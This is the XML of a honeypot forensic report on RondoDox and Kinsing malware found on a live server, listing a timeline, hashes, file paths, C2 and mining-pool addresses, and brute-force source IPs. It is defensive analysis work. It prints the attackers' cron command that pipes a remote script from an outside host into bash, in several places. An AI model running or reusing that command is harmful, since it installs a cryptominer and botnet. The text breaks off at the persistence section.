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E3A5F"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot Forensic Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox + Kinsing — Live Server Extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server: agricultureintech (203.0.113.249)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C00000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL  |  March 24, 2026  |  Analyst: Chris  |  Analysis: Claude Opus 4.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the forensic extraction of a live honeypot server (agricultureintech, 203.0.113.249) hosting two confirmed malware families: RondoDox and Kinsing. The server was running Apache with Guacamole as the primary attack surface. Both malware families were actively running at the time of extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Kinsing malware had been active since March 12, 2026, with its cryptocurrency miner (kdevtmpfsi) consuming 401% CPU since March 19. A root-level cron job was downloading and executing a dropper script from 80.64.16.241 every minute. The RondoDox binary was found in /root alongside a team-recovered copy. The server was also under sustained SSH brute-force attacks from multiple global IPs at the time of collection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All malware binaries, configuration data, persistence mechanisms, logs, network captures, and forensic artifacts were successfully extracted before the server wipe. Binaries are stored in a password-protected zip (password: infected) with .DEFANGED extensions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1 — Infection 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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Event</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Mar 11</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Server brought online (based on kernel process start times in ps output)</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Mar 12</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Kinsing binary (/etc/data/kinsing) begins execution as root, PID 48227. Likely exploited Apache Guacamole (CVE-2020-9497/CVE-2020-9498 or similar).</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Mar 19 02:19</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Root crontab modified. Kinsing installs: * * * * * wget -q -O - http://80.64.16.241/mt.sh | bash</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Mar 19</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kdevtmpfsi (XMRig miner) deployed to /tmp/kdevtmpfsi, PID 960488. Begins mining at 401% CPU, connecting to 185.221.152.130:443.</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Mar 19+</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RondoDox binary discovered and extracted by team to /root/rondo_dump.bin and /root/recovered_rondo.bin.</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Mar 24 12:34</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Forensic extraction completed. 89 collection operations across 7 phases. Server handed off for wipe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2 — Malware Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 — Kinsing (Go Binary)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0"/>
        <w:gridCol w:w="6960"/>
      </w:tblGrid>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Path on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/data/kinsing</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Backup found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/etc/data/kinsing.bak (5,967,872 bytes)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SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c</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PID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48227 (running since Mar 12)</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Listening port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31190 (C2 callback / command listener)</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Language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Go (confirmed via embedded runtime symbols)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Functions found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main.Kill, main.Task, main.MinerUrl, main.ProcStat, main.SetSocks, main.Specification, main.TargetsWrapper, CommandWithContext</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Architecture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ELF 64-bit, dynamically linked Go binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing is a well-documented Go-based malware family that targets misconfigured cloud infrastructure. The embedded Go symbols reveal a task-based command system (main.Task, main.TaskPair), SOCKS proxy capability (main.SetSocks), process management (main.Kill, main.ProcStat), and miner URL configuration (main.MinerUrl). The binary acts as a dropper, C2 client, and persistence manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 — kdevtmpfsi (XMRig Miner)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0"/>
        <w:gridCol w:w="6960"/>
      </w:tblGrid>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Path on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/kdevtmpfsi</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Backup found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/tmp/kdevtmpfsi.bak (identical, 2,084,964 bytes)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SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6fc94d8aecc538b1d099a429fb68ac20d7b6ae8b3c7795ae72dd2b7107690b8f</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PID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960488 (running since Mar 19, 401% CPU)</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Packing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UPX (confirmed via header: 'UPX!' and embedded string)</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Mining pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">185.221.152.130:443 (active connection at time of capture)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CPU usage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401% (4+ cores saturated)</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Purpose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Monero (XMR) cryptocurrency mining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The miner binary name (kdevtmpfsi) is a well-known Kinsing signature, designed to resemble the legitimate Linux kernel thread 'kdevtmpfs'. The .bak copy indicates Kinsing maintains a backup for recovery. The binary is UPX-packed and connected to a mining pool at 185.221.152.130 over port 443 (HTTPS port to evade firewall rules).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 — RondoDox (Botnet Binary)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0"/>
        <w:gridCol w:w="6960"/>
      </w:tblGrid>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Path on server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/root/rondo_dump.bin (and /root/recovered_rondo.bin)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SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7d69ffa881ca2953defe4fb5320c7d007d81713ac22e1dbcf77221fdc4d2c67e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File size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123,672 bytes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Architecture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ELF 64-bit x86-64, statically linked, stripped</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Entry point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0x0000000000400194</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Libc</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musl (statically linked, minimal footprint)</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Known C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">45.92.1.50 (from prior static analysis)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Capabilities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DDoS (15+ attack types), crypto mining, SSH propagation, system wiper</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Section count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11 (.text 105KB, .rodata 7.4KB, .data 8.1KB, .bss 4.2MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed static analysis of this binary was performed in a prior session and is documented in the companion report (RondoDox_Analysis.docx). Key findings include a 9-layer custom encryption scheme (fully reversed), 15+ DDoS attack vectors, SSH lateral movement using spoofed version strings, anti-analysis evasion targeting 16+ security tools, and a destructive wiper capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 — Dropper Script (mt.sh)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0"/>
        <w:gridCol w:w="6960"/>
      </w:tblGrid>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Delivery URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9C3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C2D12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://80.64.16.241/mt.sh</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Execution method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wget -q -O - | bash (pipe to shell, no file on disk)</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Frequency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Every minute via root crontab</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Crontab installed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March 19, 2026 at 02:19:44 UTC</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Purpose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Maintain persistence, check-in, update miner/kinsing if needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The dropper runs fileless — it is piped directly to bash and never touches disk. This makes it invisible to file-based scanning. It serves as the Kinsing heartbeat and update mechanism, downloading fresh instructions every minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3 — Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 — Network IOCs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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Role</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45.92.1.50</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RondoDox C2 server (from static analysis)</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80.64.16.241</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Kinsing dropper server (mt.sh delivery)</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185.221.152.130:443</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XMRig mining pool (active connection from kdevtmpfsi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 — File Hashes (SHA256)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Hash (truncated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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File</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787e2c94e6d9...787c</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Kinsing binary (/etc/data/kinsing.bak)</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6fc94d8aecc5...0b8f</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kdevtmpfsi miner (/tmp/kdevtmpfsi and .bak)</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7d69ffa881ca...d2c67e</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RondoDox binary (/root/rondo_dump.bin)</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e3b0c44298fc...b855</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Empty file (/tmp/kinsing.bin — cleaned marker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 — File System IOCs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Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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/etc/data/kinsing</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Kinsing binary — running as root</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/etc/data/kinsing.bak</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Kinsing backup (5.9MB Go binary)</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/tmp/kdevtmpfsi</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XMRig miner (UPX-packed, 2MB)</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/tmp/kdevtmpfsi.bak</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Miner backup (identical copy)</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/tmp/kinsing.bin</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Empty marker file (0 bytes)</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/root/rondo_dump.bin</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RondoDox binary (team recovery)</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/root/recovered_rondo.bin</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RondoDox binary (team recovery, identical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 — Process IOCs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Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Details</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/etc/data/kinsing</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PID 48227, running since Mar 12, listening :31190</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/tmp/kdevtmpfsi</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PID 960488, running since Mar 19, 401% CPU, connected to 185.221.152.130:443</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wget -q -O - http://80.64.16.241/mt.sh</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Spawned every minute by root crontab via cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 — SSH Brute-Force Attackers (Active at Time of Capture)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Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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Attack Pattern</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175.196.135.148</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Systematic credential stuffing: ftpuser, test1, test2, ubuntu</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2.57.122.188</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Root brute-force</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2.57.122.193-195</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Root brute-force (multiple IPs in same /24)</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2.57.121.17</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Root brute-force</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2.57.121.118</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Root brute-force</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45.148.10.152</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Root brute-force</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91.202.233.33</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Root brute-force (multiple rapid connections)</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176.120.22.13-17</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Credential stuffing: coolify, cvs, cyber usernames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4 — Persistence Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 — Root Crontab (Primary Kinsing Persistence)</w:t>
      </w:r>
    </w:p>
    <w:p>
